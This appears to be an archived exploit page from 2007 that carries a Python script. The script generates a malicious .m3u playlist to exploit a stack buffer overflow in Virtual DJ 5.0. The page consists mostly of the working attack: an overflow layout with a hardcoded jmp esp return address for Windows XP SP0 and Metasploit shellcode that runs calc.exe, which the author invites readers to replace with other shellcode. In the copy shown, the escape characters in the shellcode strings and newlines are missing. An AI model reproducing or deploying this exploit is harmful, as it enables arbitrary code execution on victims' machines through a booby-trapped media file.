Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit
# Published : 2007-09-02
# Author : 0x58
# Previous Title : OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit
# Next Title : Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit

#Virtual DJ 5.0 Local Buffer OverFlow
#224 bytes available for shellcode,, you can replace it with you favourite one,, 
#ret addr -> 0x7199403D      jmp esp in mswsock.dll Winxp sp0
#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] 
#Discovred by 0x58 && Coded By miyy3t,,Midt's lab !!
#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84"
shellcode+= "xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d"
shellcode+= "xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91"
shellcode+= "x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5"
shellcode+= "x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe"
shellcode+= "x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc"
shellcode+= "x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53"
shellcode+= "xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0"
shellcode+= "xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc"
shellcode+= "xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0"
shellcode+= "xe1xd1xfexd8"

bof = "A"*484+"x3Dx40x99x71"+"x90"*10+shellcode

file = open('c:/xploit.m3u','w+')
file.write("#EXTM3Un");
file.write("#EXTINF:0,TITLEn")
file.write("C:/")
file.write(bof)
file.close()

print "Exploit generated in c:/xploit.m3u ...now open it with virtual dj !! "

# www.Syue.com [2007-09-02]